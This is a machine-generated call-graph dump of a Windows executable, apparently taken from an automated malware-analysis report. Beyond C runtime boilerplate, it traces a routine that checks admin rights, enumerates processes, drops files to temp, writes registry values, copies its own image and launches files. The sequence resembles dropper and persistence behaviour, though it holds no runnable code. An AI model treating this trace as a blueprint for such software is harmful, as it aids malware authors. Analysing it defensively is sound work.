6495->6494 6498 4053e2 6496->6498 6499 4040db _free 66 API calls 6496->6499 6497->6496 6500 4053f4 6498->6500 6501 4040db _free 66 API calls 6498->6501 6499->6498 6502 4040db _free 66 API calls 6500->6502 6503 405406 6500->6503 6501->6500 6502->6503 6504 405418 6503->6504 6505 4040db _free 66 API calls 6503->6505 6506 40542a 6504->6506 6507 4040db _free 66 API calls 6504->6507 6505->6504 6508 40543c 6506->6508 6509 4040db _free 66 API calls 6506->6509 6507->6506 6510 40544e 6508->6510 6511 4040db _free 66 API calls 6508->6511 6509->6508 6512 405460 6510->6512 6513 4040db _free 66 API calls 6510->6513 6511->6510 6514 405472 6512->6514 6515 4040db _free 66 API calls 6512->6515 6513->6512 6516 405484 6514->6516 6517 4040db _free 66 API calls 6514->6517 6515->6514 6518 4040db _free 66 API calls 6516->6518 6516->6519 6517->6516 6518->6519 6519->6469 6521 405340 6520->6521 6531 405398 6520->6531 6522 405350 6521->6522 6523 4040db _free 66 API calls 6521->6523 6524 405362 6522->6524 6525 4040db _free 66 API calls 6522->6525 6523->6522 6526 405374 6524->6526 6527 4040db _free 66 API calls 6524->6527 6525->6524 6528 405386 6526->6528 6529 4040db _free 66 API calls 6526->6529 6527->6526 6530 4040db _free 66 API calls 6528->6530 6528->6531 6529->6528 6530->6531 6531->6470 6533 404fcd 6532->6533 6705 40384e 6532->6705 6534 4040db _free 66 API calls 6533->6534 6535 404fd5 6534->6535 6536 4040db _free 66 API calls 6535->6536 6537 404fdd 6536->6537 6538 4040db _free 66 API calls 6537->6538 6539 404fe5 6538->6539 6540 4040db _free 66 API calls 6539->6540 6541 404fed 6540->6541 6542 4040db _free 66 API calls 6541->6542 6543 404ff5 6542->6543 6544 4040db _free 66 API calls 6543->6544 6545 404ffd 6544->6545 6546 4040db _free 66 API calls 6545->6546 6547 405004 6546->6547 6548 4040db _free 66 API calls 6547->6548 6549 40500c 6548->6549 6550 4040db _free 66 API calls 6549->6550 6551 405014 6550->6551 6552 4040db _free 66 API calls 6551->6552 6553 40501c 6552->6553 6554 4040db _free 66 API calls 6553->6554 6555 405024 6554->6555 6556 4040db _free 66 API calls 6555->6556 6557 40502c 6556->6557 6558 4040db _free 66 API calls 6557->6558 6559 405034 6558->6559 6560 4040db _free 66 API calls 6559->6560 6561 40503c 6560->6561 6562 4040db _free 66 API calls 6561->6562 6563 405044 6562->6563 6564 4040db _free 66 API calls 6563->6564 6565 40504c 6564->6565 6566 4040db _free 66 API calls 6565->6566 6567 405057 6566->6567 6568 4040db _free 66 API calls 6567->6568 6569 40505f 6568->6569 6570 4040db _free 66 API calls 6569->6570 6571 405067 6570->6571 6572 4040db _free 66 API calls 6571->6572 6573 40506f 6572->6573 6574 4040db _free 66 API calls 6573->6574 6575 405077 6574->6575 6576 4040db _free 66 API calls 6575->6576 6577 40507f 6576->6577 6578 4040db _free 66 API calls 6577->6578 6579 405087 6578->6579 6580 4040db _free 66 API calls 6579->6580 6581 40508f 6580->6581 6582 4040db _free 66 API calls 6581->6582 6583 405097 6582->6583 6584 4040db _free 66 API calls 6583->6584 6585 40509f 6584->6585 6586 4040db _free 66 API calls 6585->6586 6587 4050a7 6586->6587 6588 4040db _free 66 API calls 6587->6588 6589 4050af 6588->6589 6590 4040db _free 66 API calls 6589->6590 6591 4050b7 6590->6591 6592 4040db _free 66 API calls 6591->6592 6593 4050bf 6592->6593 6594 4040db _free 66 API calls 6593->6594 6595 4050c7 6594->6595 6596 4040db _free 66 API calls 6595->6596 6597 4050cf 6596->6597 6598 4040db _free 66 API calls 6597->6598 6599 4050dd 6598->6599 6600 4040db _free 66 API calls 6599->6600 6601 4050e8 6600->6601 6602 4040db _free 66 API calls 6601->6602 6603 4050f3 6602->6603 6604 4040db _free 66 API calls 6603->6604 6605 4050fe 6604->6605 6606 4040db _free 66 API calls 6605->6606 6607 405109 6606->6607 6608 4040db _free 66 API calls 6607->6608 6609 405114 6608->6609 6610 4040db _free 66 API calls 6609->6610 6611 40511f 6610->6611 6612 4040db _free 66 API calls 6611->6612 6613 40512a 6612->6613 6614 4040db _free 66 API calls 6613->6614 6615 405135 6614->6615 6616 4040db _free 66 API calls 6615->6616 6617 405140 6616->6617 6618 4040db _free 66 API calls 6617->6618 6619 40514b 6618->6619 6620 4040db _free 66 API calls 6619->6620 6621 405156 6620->6621 6622 4040db _free 66 API calls 6621->6622 6623 405161 6622->6623 6624 4040db _free 66 API calls 6623->6624 6625 40516c 6624->6625 6626 4040db _free 66 API calls 6625->6626 6627 405177 6626->6627 6628 4040db _free 66 API calls 6627->6628 6629 405182 6628->6629 6630 4040db _free 66 API calls 6629->6630 6631 405190 6630->6631 6632 4040db _free 66 API calls 6631->6632 6633 40519b 6632->6633 6634 4040db _free 66 API calls 6633->6634 6635 4051a6 6634->6635 6636 4040db _free 66 API calls 6635->6636 6637 4051b1 6636->6637 6638 4040db _free 66 API calls 6637->6638 6639 4051bc 6638->6639 6640 4040db _free 66 API calls 6639->6640 6641 4051c7 6640->6641 6642 4040db _free 66 API calls 6641->6642 6643 4051d2 6642->6643 6644 4040db _free 66 API calls 6643->6644 6645 4051dd 6644->6645 6646 4040db _free 66 API calls 6645->6646 6647 4051e8 6646->6647 6648 4040db _free 66 API calls 6647->6648 6649 4051f3 6648->6649 6650 4040db _free 66 API calls 6649->6650 6651 4051fe 6650->6651 6652 4040db _free 66 API calls 6651->6652 6653 405209 6652->6653 6654 4040db _free 66 API calls 6653->6654 6655 405214 6654->6655 6656 4040db _free 66 API calls 6655->6656 6657 40521f 6656->6657 6658 4040db _free 66 API calls 6657->6658 6659 40522a 6658->6659 6660 4040db _free 66 API calls 6659->6660 6661 405235 6660->6661 6662 4040db _free 66 API calls 6661->6662 6663 405243 6662->6663 6664 4040db _free 66 API calls 6663->6664 6665 40524e 6664->6665 6666 4040db _free 66 API calls 6665->6666 6667 405259 6666->6667 6668 4040db _free 66 API calls 6667->6668 6669 405264 6668->6669 6670 4040db _free 66 API calls 6669->6670 6671 40526f 6670->6671 6672 4040db _free 66 API calls 6671->6672 6673 40527a 6672->6673 6674 4040db _free 66 API calls 6673->6674 6675 405285 6674->6675 6676 4040db _free 66 API calls 6675->6676 6677 405290 6676->6677 6678 4040db _free 66 API calls 6677->6678 6679 40529b 6678->6679 6680 4040db _free 66 API calls 6679->6680 6681 4052a6 6680->6681 6682 4040db _free 66 API calls 6681->6682 6683 4052b1 6682->6683 6684 4040db _free 66 API calls 6683->6684 6685 4052bc 6684->6685 6686 4040db _free 66 API calls 6685->6686 6687 4052c7 6686->6687 6688 4040db _free 66 API calls 6687->6688 6689 4052d2 6688->6689 6690 4040db _free 66 API calls 6689->6690 6691 4052dd 6690->6691 6692 4040db _free 66 API calls 6691->6692 6693 4052e8 6692->6693 6694 4040db _free 66 API calls 6693->6694 6695 4052f6 6694->6695 6696 4040db _free 66 API calls 6695->6696 6697 405301 6696->6697 6698 4040db _free 66 API calls 6697->6698 6699 40530c 6698->6699 6700 4040db _free 66 API calls 6699->6700 6701 405317 6700->6701 6702 4040db _free 66 API calls 6701->6702 6703 405322 6702->6703 6704 4040db _free 66 API calls 6703->6704 6704->6705 6705->6474 6706->6447 6710 40352b LeaveCriticalSection 6707->6710 6709 403c35 6709->6426 6710->6709 6712 403c37 _LocaleUpdate::_LocaleUpdate 76 API calls 6711->6712 6713 4057e1 6712->6713 6721 4056e7 6713->6721 6716 4056a1 6717 403c37 _LocaleUpdate::_LocaleUpdate 76 API calls 6716->6717 6718 4056b4 6717->6718 6738 4054ba 6718->6738 6722 405710 MultiByteToWideChar 6721->6722 6723 405705 6721->6723 6724 405739 6722->6724 6726 40573d 6722->6726 6723->6722 6725 401999 __NMSG_WRITE 5 API calls 6724->6725 6727 403aa6 6725->6727 6729 405752 _memset __alloca_probe_16 6726->6729 6730 40580e _malloc 66 API calls 6726->6730 6727->6716 6728 40578b MultiByteToWideChar 6731 4057a1 GetStringTypeW 6728->6731 6732 4057b2 6728->6732 6729->6724 6729->6728 6730->6729 6731->6732 6734 40549a 6732->6734 6735 4054a6 6734->6735 6736 4054b7 6734->6736 6735->6736 6737 4040db _free 66 API calls 6735->6737 6736->6724 6737->6736 6739 4054d8 MultiByteToWideChar 6738->6739 6741 405536 6739->6741 6746 40553d 6739->6746 6743 401999 __NMSG_WRITE 5 API calls 6741->6743 6742 405556 __alloca_probe_16 6742->6741 6744 40558a MultiByteToWideChar 6742->6744 6745 403ac6 6743->6745 6747 4055a3 LCMapStringW 6744->6747 6761 405682 6744->6761 6745->6396 6746->6742 6748 40580e _malloc 66 API calls 6746->6748 6749 4055c2 6747->6749 6747->6761 6748->6742 6751 4055cc 6749->6751 6752 4055f5 6749->6752 6750 40549a __freea 66 API calls 6750->6741 6753 4055e0 LCMapStringW 6751->6753 6751->6761 6757 405610 __alloca_probe_16 6752->6757 6758 40580e _malloc 66 API calls 6752->6758 6753->6761 6754 405644 LCMapStringW 6755 40565a WideCharToMultiByte 6754->6755 6756 40567c 6754->6756 6755->6756 6759 40549a __freea 66 API calls 6756->6759 6757->6754 6757->6761 6758->6757 6759->6761 6761->6750 5668 401b1c 5706 403140 5668->5706 5670 401b28 GetStartupInfoW 5671 401b3c HeapSetInformation 5670->5671 5673 401b47 5670->5673 5671->5673 5707 403120 HeapCreate 5673->5707 5674 401b95 5675 401ba0 5674->5675 5838 401af3 5674->5838 5708 402303 GetModuleHandleW 5675->5708 5678 401ba6 5679 401bb1 __RTC_Initialize 5678->5679 5680 401af3 _fast_error_exit 66 API calls 5678->5680 5733 402e8f GetStartupInfoW 5679->5733 5680->5679 5683 401bcb GetCommandLineW 5746 402e37 GetEnvironmentStringsW 5683->5746 5687 401bdb 5753 402d89 GetModuleFileNameW 5687->5753 5690 401bf0 5759 402b57 5690->5759 5691 40279b __amsg_exit 66 API calls 5691->5690 5693 401bf6 5694 401c01 5693->5694 5695 40279b __amsg_exit 66 API calls 5693->5695 5773 40257a 5694->5773 5695->5694 5697 401c09 5698 40279b __amsg_exit 66 API calls 5697->5698 5699 401c14 __wwincmdln 5697->5699 5698->5699 5779 4014f0 5699->5779 5702 401c44 5853 40277d 5702->5853 5705 401c49 __mtinitlocknum 5706->5670 5707->5674 5709 402320 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5708->5709 5710 402317 5708->5710 5712 40236a TlsAlloc 5709->5712 5856 402050 5710->5856 5715 4023b8 TlsSetValue 5712->5715 5716 402479 5712->5716 5715->5716 5717 4023c9 5715->5717 5716->5678 5866 402523 5717->5866 5722 402411 DecodePointer 5725 402426 5722->5725 5723 402474 5724 402050 __mtterm 70 API calls 5723->5724 5724->5716 5725->5723 5875 40415a 5725->5875 5728 402444 DecodePointer 5729 402455 5728->5729 5729->5723 5730 402459 5729->5730 5881 40208d 5730->5881 5732 402461 GetCurrentThreadId 5732->5716 5734 40415a __calloc_crt 66 API calls 5733->5734 5742 402ead 5734->5742 5735 403058 GetStdHandle 5740 403022 5735->5740 5736 40415a __calloc_crt 66 API calls 5736->5742 5737 4030bc SetHandleCount 5738 401bbf 5737->5738 5738->5683 5846 40279b 5738->5846 5739 40306a GetFileType 5739->5740 5740->5735 5740->5737 5740->5739 5745 403090 InitializeCriticalSectionAndSpinCount 5740->5745 5741 402fa2 5741->5740 5743 402fd9 InitializeCriticalSectionAndSpinCount 5741->5743 5744 402fce GetFileType 5741->5744 5742->5736 5742->5738 5742->5740 5742->5741 5743->5738 5743->5741 5744->5741 5744->5743 5745->5738 5745->5740 5747 402e48 5746->5747 5748 402e4c 5746->5748 5747->5687 5750 404115 __malloc_crt 66 API calls 5748->5750 5751 402e6e _memmove 5750->5751 5752 402e75 FreeEnvironmentStringsW 5751->5752 5752->5687 5754 402dbe _wparse_cmdline 5753->5754 5755 401be5 5754->5755 5756 402dfb 5754->5756 5755->5690 5755->5691 5757 404115 __malloc_crt 66 API calls 5756->5757 5758 402e01 _wparse_cmdline 5757->5758 5758->5755 5760 402b6f _wcslen 5759->5760 5764 402b67 5759->5764 5761 40415a __calloc_crt 66 API calls 5760->5761 5766 402b93 _wcslen 5761->5766 5762 402be9 5763 4040db _free 66 API calls 5762->5763 5763->5764 5764->5693 5765 40415a __calloc_crt 66 API calls 5765->5766 5766->5762 5766->5764 5766->5765 5767 402c0f 5766->5767 5769 4019e8 __NMSG_WRITE 66 API calls 5766->5769 5770 402c26 5766->5770 5768 4040db _free 66 API calls 5767->5768 5768->5764 5769->5766 5771 401fa8 __invoke_watson 10 API calls 5770->5771 5772 402c32 5771->5772 5772->5693 5774 402588 __IsNonwritableInCurrentImage 5773->5774 6122 40459b 5774->6122 5776 4025a6 __initterm_e 5778 4025c7 __IsNonwritableInCurrentImage 5776->5778 6125 404584 5776->6125 5778->5697 6190 401000 GetVersionExW 5779->6190 5781 401509 _memset 5782 401599 GetTickCount 5781->5782 6205 401a4b 5782->6205 5785 4015c4 _memset 5788 4015d5 CreateToolhelp32Snapshot 5785->5788 5786 40176c 5787 401999 __NMSG_WRITE 5 API calls 5786->5787 5789 40177b 5787->5789 5790 4016a1 GetTempPathW 5788->5790 5791 401627 Process32FirstW 5788->5791 5789->5702 5835 402751 5789->5835 5792 4016cd 5790->5792 5793 4016b7 5790->5793 5791->5790 5794 401639 Process32NextW 5791->5794 6208 401a7e 5792->6208 5795 4019e8 __NMSG_WRITE 66 API calls 5793->5795 5794->5790 5800 40164d 5794->5800 5795->5792 5798 401a7e __NMSG_WRITE 66 API calls 5799 40170d CreateFileW WriteFile CloseHandle 5798->5799 6217 401290 5799->6217 5803 401781 5800->5803 5804 401693 Process32NextW 5800->5804 5802 401753 ShellExecuteExW 5802->5786 5805 401806 ExpandEnvironmentStringsW GetTempPathW 5803->5805 5806 40178e ExpandEnvironmentStringsW 5803->5806 5804->5790 5804->5800 5808 401844 5805->5808 5809 40182e 5805->5809 5807 4019e8 __NMSG_WRITE 66 API calls 5806->5807 5810 4017b8 5807->5810 5812 4019e8 __NMSG_WRITE 66 API calls 5808->5812 5811 4019e8 __NMSG_WRITE 66 API calls 5809->5811 5813 401a7e __NMSG_WRITE 66 API calls 5810->5813 5811->5808 5814 40185f 5812->5814 5815 4017ce CreateDirectoryW 5813->5815 5816 401a7e __NMSG_WRITE 66 API calls 5814->5816 5817 401a7e __NMSG_WRITE 66 API calls 5815->5817 5818 401875 5816->5818 5819 4017f7 CreateDirectoryW 5817->5819 6238 401220 5818->6238 5819->5808 5822 401a7e __NMSG_WRITE 66 API calls 5823 40188c 5822->5823 5824 401a7e __NMSG_WRITE 66 API calls 5823->5824 5825 4018a2 5824->5825 5826 4019e8 __NMSG_WRITE 66 API calls 5825->5826 5827 4018ba 5826->5827 5828 401a7e __NMSG_WRITE 66 API calls 5827->5828 5829 4018d0 CreateFileW WriteFile CloseHandle 5828->5829 5830 401290 91 API calls 5829->5830 5831 401916 7 API calls 5830->5831 5831->5786 5832 40197f 5831->5832 6241 401110 CoInitialize 5832->6241 5834 401991 5834->5786 6264 402611 5835->6264 5837 402762 5837->5702 5839 401b01 5838->5839 5840 401b06 5838->5840 5841 40298e __FF_MSGBANNER 66 API calls 5839->5841 5842 4027df __NMSG_WRITE 66 API calls 5840->5842 5841->5840 5843 401b0e 5842->5843 5844 4024f9 _malloc 3 API calls 5843->5844 5845 401b18 5844->5845 5845->5675 5847 40298e __FF_MSGBANNER 66 API calls 5846->5847 5848 4027a5 5847->5848 5849 4027df __NMSG_WRITE 66 API calls 5848->5849 5850 4027ad 5849->5850 6294 402767 5850->6294 5854 402611 _doexit 66 API calls 5853->5854 5855 402788 5854->5855 5855->5705 5857 402069 5856->5857 5858 40205a DecodePointer 5856->5858 5859 40207a TlsFree 5857->5859 5860 402088 5857->5860 5858->5857 5859->5860 5861 4034f0 DeleteCriticalSection 5860->5861 5862 403508 5860->5862 5894 4040db 5861->5894 5864 40351a DeleteCriticalSection 5862->5864 5865 40231c 5862->5865 5864->5862 5865->5678 5920 40200a RtlEncodePointer 5866->5920 5868 40252b __init_pointers __initp_misc_winsig 5921 40422d EncodePointer 5868->5921 5870 4023ce EncodePointer EncodePointer EncodePointer EncodePointer 5871 40348a 5870->5871 5872 403495 5871->5872 5873 40349f InitializeCriticalSectionAndSpinCount 5872->5873 5874 40240d 5872->5874 5873->5872 5873->5874 5874->5722 5874->5723 5878 404163 5875->5878 5877 40243c 5877->5723 5877->5728 5878->5877 5879 404181 Sleep 5878->5879 5922 401dee 5878->5922 5880 404196 5879->5880 5880->5877 5880->5878 5933 403140 5881->5933 5883 402099 GetModuleHandleW 5934 403604 5883->5934 5885 4020d7 InterlockedIncrement 5941 40212f 5885->5941 5888 403604 __lock 64 API calls 5889 4020f8 5888->5889 5944 403637 InterlockedIncrement 5889->5944 5891 402116 5956 402138 5891->5956 5893 402123 __mtinitlocknum 5893->5732 5895 40410f _free 5894->5895 5896 4040e6 HeapFree 5894->5896 5895->5860 5896->5895 5897 4040fb 5896->5897 5900 401ddb 5897->5900 5903 402141 GetLastError 5900->5903 5902 401de0 GetLastError 5902->5895 5917 40201c TlsGetValue 5903->5917 5906 4021ae SetLastError 5906->5902 5907 40415a __calloc_crt 62 API calls 5908 40216c 5907->5908 5908->5906 5909 402174 DecodePointer 5908->5909 5910 402189 5909->5910 5911 4021a5 5910->5911 5912 40218d 5910->5912 5914 4040db _free 62 API calls 5911->5914 5913 40208d __getptd_noexit 62 API calls 5912->5913 5915 402195 GetCurrentThreadId 5913->5915 5916 4021ab 5914->5916 5915->5906 5916->5906 5918 402031 DecodePointer TlsSetValue 5917->5918 5919 40204c 5917->5919 5918->5919 5919->5906 5919->5907 5920->5868 5921->5870 5923 401dfa 5922->5923 5928 401e15 5922->5928 5924 401e06 5923->5924 5923->5928 5925 401ddb _malloc 65 API calls 5924->5925 5929 401e0b 5925->5929 5926 401e28 RtlAllocateHeap 5927 401e4f 5926->5927 5926->5928 5927->5878 5928->5926 5928->5927 5931 4033e1 DecodePointer 5928->5931 5929->5878 5932 4033f6 5931->5932 5932->5928 5933->5883 5935 403619 5934->5935 5936 40362c EnterCriticalSection 5934->5936 5959 403542 5935->5959 5936->5885 5938 40361f 5938->5936 5939 40279b __amsg_exit 65 API calls 5938->5939 5940 40362b 5939->5940 5940->5936 6120 40352b LeaveCriticalSection 5941->6120 5943 4020f1 5943->5888 5945 403655 InterlockedIncrement 5944->5945 5946 403658 5944->5946 5945->5946 5947 403662 InterlockedIncrement 5946->5947 5948 403665 5946->5948 5947->5948 5949 403672 5948->5949 5950 40366f InterlockedIncrement 5948->5950 5951 40367c InterlockedIncrement 5949->5951 5952 40367f 5949->5952 5950->5949 5951->5952 5953 403698 InterlockedIncrement 5952->5953 5954 4036a8 InterlockedIncrement 5952->5954 5955 4036b3 InterlockedIncrement 5952->5955 5953->5952 5954->5952 5955->5891 6121 40352b LeaveCriticalSection 5956->6121 5958 40213f 5958->5893 5960 40354e __mtinitlocknum 5959->5960 5961 403574 5960->5961 5984 40298e 5960->5984 5967 403584 __mtinitlocknum 5961->5967 6020 404115 5961->6020 5967->5938 5969 4035a5 5971 403604 __lock 65 API calls 5969->5971 5970 403596 5973 401ddb _malloc 65 API calls 5970->5973 5974 4035ac 5971->5974 5973->5967 5975 4035b4 InitializeCriticalSectionAndSpinCount 5974->5975 5976 4035df 5974->5976 5977 4035c4 5975->5977 5978 4035d0 5975->5978 5979 4040db _free 65 API calls 5976->5979 5980 4040db _free 65 API calls 5977->5980 6025 4035fb 5978->6025 5979->5978 5981 4035ca 5980->5981 5983 401ddb _malloc 65 API calls 5981->5983 5983->5978 6028 4049ef 5984->6028 5986 402995 5987 4029a2 5986->5987 5988 4049ef __NMSG_WRITE 66 API calls 5986->5988 5989 4027df __NMSG_WRITE 66 API calls 5987->5989 5992 4029c4 5987->5992 5988->5987 5990 4029ba 5989->5990 5991 4027df __NMSG_WRITE 66 API calls 5990->5991 5991->5992 5993 4027df 5992->5993 5994 402800 __NMSG_WRITE 5993->5994 5996 4049ef __NMSG_WRITE 63 API calls 5994->5996 6016 40291c 5994->6016 5998 40281a 5996->5998 5997 40298c 6017 4024f9 5997->6017 5999 40292b GetStdHandle 5998->5999 6000 4049ef __NMSG_WRITE 63 API calls 5998->6000 6003 402939 _strlen 5999->6003 5999->6016 6001 40282b 6000->6001 6001->5999 6002 40283d 6001->6002 6002->6016 6053 4019e8 6002->6053 6006 40296f WriteFile 6003->6006 6003->6016 6006->6016 6007 402896 _wcslen 6011 401fa8 __invoke_watson 10 API calls 6007->6011 6012 401a7e 63 API calls __NMSG_WRITE 6007->6012 6014 40290c 6007->6014 6062 404907 6007->6062 6008 402869 GetModuleFileNameW 6008->6007 6009 40288a 6008->6009 6010 4019e8 __NMSG_WRITE 63 API calls 6009->6010 6010->6007 6011->6007 6012->6007 6071 40479b 6014->6071 6089 401999 6016->6089 6099 4024ce GetModuleHandleW 6017->6099 6023 40411e 6020->6023 6022 40358f 6022->5969 6022->5970 6023->6022 6024 404135 Sleep 6023->6024 6103 40580e 6023->6103 6024->6023 6119 40352b LeaveCriticalSection 6025->6119 6027 403602 6027->5967 6029 4049fb 6028->6029 6030 404a05 6029->6030 6031 401ddb _malloc 66 API calls 6029->6031 6030->5986 6032 404a1e 6031->6032 6035 401ffa 6032->6035 6038 401fcd DecodePointer 6035->6038 6039 401fe2 6038->6039 6044 401fa8 6039->6044 6041 401ff9 6042 401fcd _raise 10 API calls 6041->6042 6043 402006 6042->6043 6043->5986 6047 401e7f 6044->6047 6048 401e9e _memset __call_reportfault 6047->6048 6049 401ebc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6048->6049 6050 401f8a __call_reportfault 6049->6050 6051 401999 __NMSG_WRITE 5 API calls 6050->6051 6052 401fa6 GetCurrentProcess TerminateProcess 6051->6052 6052->6041 6054 4019f6 6053->6054 6055 4019fd 6053->6055 6054->6055 6059 401a1e 6054->6059 6056 401ddb _malloc 66 API calls 6055->6056 6057 401a02 6056->6057 6058 401ffa _raise 11 API calls 6057->6058 6060 401a0c 6058->6060 6059->6060 6061 401ddb _malloc 66 API calls 6059->6061 6060->6007 6060->6008 6061->6057 6063 404919 6062->6063 6065 40491d 6063->6065 6068 404922 6063->6068 6069 404960 6063->6069 6064 401ddb _malloc 66 API calls 6066 404939 6064->6066 6065->6064 6065->6068 6067 401ffa _raise 11 API calls 6066->6067 6067->6068 6068->6007 6069->6068 6070 401ddb _malloc 66 API calls 6069->6070 6070->6066 6097 40200a RtlEncodePointer 6071->6097 6073 4047c1 6074 4047d1 LoadLibraryW 6073->6074 6075 40484e 6073->6075 6076 4048e6 6074->6076 6077 4047e6 GetProcAddress 6074->6077 6081 404868 DecodePointer DecodePointer 6075->6081 6085 40487b 6075->6085 6082 401999 __NMSG_WRITE 5 API calls 6076->6082 6077->6076 6080 4047fc 7 API calls 6077->6080 6078 4048b1 DecodePointer 6079 4048da DecodePointer 6078->6079 6083 4048b8 6078->6083 6079->6076 6080->6075 6084 40483e GetProcAddress EncodePointer 6080->6084 6081->6085 6086 404905 6082->6086 6083->6079 6088 4048cb DecodePointer 6083->6088 6084->6075 6085->6078 6085->6079 6087 40489e 6085->6087 6086->6016 6087->6079 6088->6079 6088->6087 6090 4019a1 6089->6090 6091 4019a3 IsDebuggerPresent 6089->6091 6090->5997 6098 4033ca 6091->6098 6094 401d60 SetUnhandledExceptionFilter UnhandledExceptionFilter 6095 401d85 GetCurrentProcess TerminateProcess 6094->6095 6096 401d7d __call_reportfault 6094->6096 6095->5997 6096->6095 6097->6073 6098->6094 6100 4024e2 GetProcAddress 6099->6100 6101 4024f7 ExitProcess 6099->6101 6100->6101 6102 4024f2 6100->6102 6102->6101 6104 40588b 6103->6104 6116 40581c 6103->6116 6105 4033e1 _malloc DecodePointer 6104->6105 6106 405891 6105->6106 6107 401ddb _malloc 65 API calls 6106->6107 6118 405883 6107->6118 6108 40298e __FF_MSGBANNER 65 API calls 6108->6116 6109 40584a HeapAlloc 6109->6116 6109->6118 6110 4027df __NMSG_WRITE 65 API calls 6110->6116 6111 405877 6113 401ddb _malloc 65 API calls 6111->6113 6112 4033e1 _malloc DecodePointer 6112->6116 6115 405875 6113->6115 6114 4024f9 _malloc 3 API calls 6114->6116 6117 401ddb _malloc 65 API calls 6115->6117 6116->6108 6116->6109 6116->6110 6116->6111 6116->6112 6116->6114 6116->6115 6117->6118 6118->6023 6119->6027 6120->5943 6121->5958 6123 4045a1 EncodePointer 6122->6123 6123->6123 6124 4045bb 6123->6124 6124->5776 6128 404548 6125->6128 6127 404591 6127->5778 6129 404554 __mtinitlocknum 6128->6129 6136 402511 6129->6136 6135 404575 __mtinitlocknum 6135->6127 6137 403604 __lock 66 API calls 6136->6137 6138 402518 6137->6138 6139 404461 DecodePointer DecodePointer 6138->6139 6140 404510 6139->6140 6141 40448f 6139->6141 6150 40457e 6140->6150 6141->6140 6153 405982 6141->6153 6143 4044a1 6144 4044f3 EncodePointer EncodePointer 6143->6144 6145 4044c5 6143->6145 6160 4041a6 6143->6160 6144->6140 6145->6140 6147 4041a6 __realloc_crt 70 API calls 6145->6147 6148 4044e1 EncodePointer 6145->6148 6149 4044db 6147->6149 6148->6144 6149->6140 6149->6148 6186 40251a 6150->6186 6154 4059a2 HeapSize 6153->6154 6155 40598d 6153->6155 6154->6143 6156 401ddb _malloc 66 API calls 6155->6156 6157 405992 6156->6157 6158 401ffa _raise 11 API calls 6157->6158 6159 40599d 6158->6159 6159->6143 6162 4041af 6160->6162 6163 4041ee 6162->6163 6164 4041cf Sleep 6162->6164 6165 4058a2 6162->6165 6163->6145 6164->6162 6166 4058b8 6165->6166 6167 4058ad 6165->6167 6169 4058c0 6166->6169 6177 4058cd 6166->6177 6168 40580e _malloc 66 API calls 6167->6168 6170 4058b5 6168->6170 6171 4040db _free 66 API calls 6169->6171 6170->6162 6185 4058c8 _free 6171->6185 6172 405905 6173 4033e1 _malloc DecodePointer 6172->6173 6175 40590b 6173->6175 6174 4058d5 HeapReAlloc 6174->6177 6174->6185 6178 401ddb _malloc 66 API calls 6175->6178 6176 405935 6180 401ddb _malloc 66 API calls 6176->6180 6177->6172 6177->6174 6177->6176 6179 4033e1 _malloc DecodePointer 6177->6179 6182 40591d 6177->6182 6178->6185 6179->6177 6181 40593a GetLastError 6180->6181 6181->6185 6183 401ddb _malloc 66 API calls 6182->6183 6184 405922 GetLastError 6183->6184 6184->6185 6185->6162 6189 40352b LeaveCriticalSection 6186->6189 6188 402521 6188->6135 6189->6188 6191 4010aa AllocateAndInitializeSid 6190->6191 6192 40103f GetCurrentProcess OpenProcessToken 6190->6192 6193 401099 6191->6193 6195 4010ce CheckTokenMembership 6191->6195 6192->6193 6194 40105c GetTokenInformation 6192->6194 6197 401999 __NMSG_WRITE 5 API calls 6193->6197 6194->6193 6196 40107f 6194->6196 6198 4010e7 6195->6198 6199 4010ed FreeSid 6195->6199 6200 401999 __NMSG_WRITE 5 API calls 6196->6200 6201 4010a6 6197->6201 6198->6199 6202 401999 __NMSG_WRITE 5 API calls 6199->6202 6203 401095 6200->6203 6201->5781 6204 40110b 6202->6204 6203->5781 6204->5781 6249 4021ba 6205->6249 6209 401a93 6208->6209 6212 401a8c 6208->6212 6210 401ddb _malloc 66 API calls 6209->6210 6211 401a98 6210->6211 6213 401ffa _raise 11 API calls 6211->6213 6212->6209 6215 401ac8 6212->6215 6214 4016e6 CreateDirectoryW 6213->6214 6214->5798 6215->6214 6216 401ddb _malloc 66 API calls 6215->6216 6216->6211 6218 401000 12 API calls 6217->6218 6219 4012a9 RegOpenKeyExW 6218->6219 6221 401307 RegSetValueExW RegCloseKey RegOpenKeyExW 6219->6221 6222 4012eb RegCloseKey 6219->6222 6224 4014e0 6221->6224 6228 401356 _memset 6221->6228 6223 401999 __NMSG_WRITE 5 API calls 6222->6223 6225 401303 6223->6225 6226 401999 __NMSG_WRITE 5 API calls 6224->6226 6225->5802 6227 4014ec 6226->6227 6227->5802 6229 4013a5 GetModuleFileNameW GetTempPathW 6228->6229 6230 4013d2 6229->6230 6231 4013eb GetTempFileNameW CopyFileW CreateFileW 6229->6231 6232 4019e8 __NMSG_WRITE 66 API calls 6230->6232 6231->6224 6233 401444 GetFileSize VirtualAlloc ReadFile 6231->6233 6234 4013e8 6232->6234 6254 401a5d 6233->6254 6234->6231 6257 4019a8 6238->6257 6242 4011e3 CoUninitialize 6241->6242 6243 401126 CoCreateInstance 6241->6243 6244 4011e9 6242->6244 6243->6244 6245 401146 6243->6245 6244->5834 6246 4011d2 6245->6246 6247 4011ef CoUninitialize 6245->6247 6246->6242 6247->5834 6250 402141 __getptd_noexit 66 API calls 6249->6250 6251 4021c2 6250->6251 6252 4015a8 OpenMutexW 6251->6252 6253 40279b __amsg_exit 66 API calls 6251->6253 6252->5785 6252->5786 6253->6252 6255 4021ba __getptd 66 API calls 6254->6255 6256 401479 RegSetValueExW VirtualFree CloseHandle RegCloseKey DeleteFileW 6255->6256 6256->6224 6258 401dee _calloc 66 API calls 6257->6258 6259 4019c2 6258->6259 6260 401234 6259->6260 6261 401ddb _malloc 66 API calls 6259->6261 6260->5822 6262 4019d5 6261->6262 6262->6260 6263 401ddb _malloc 66 API calls 6262->6263 6263->6260 6265 40261d __mtinitlocknum 6264->6265 6266 403604 __lock 61 API calls 6265->6266 6267 402624 6266->6267 6269 40264f RtlDecodePointer 6267->6269 6274 4026ce 6267->6274 6271 402666 DecodePointer 6269->6271 6269->6274 6283 402679 6271->6283 6272 40274b __mtinitlocknum 6272->5837 6285 40273c 6274->6285 6275 402733 6277 4024f9 _malloc 3 API calls 6275->6277 6278 40273c 6277->6278 6279 402749 6278->6279 6292 40352b LeaveCriticalSection 6278->6292 6279->5837 6280 402690 DecodePointer 6291 40200a 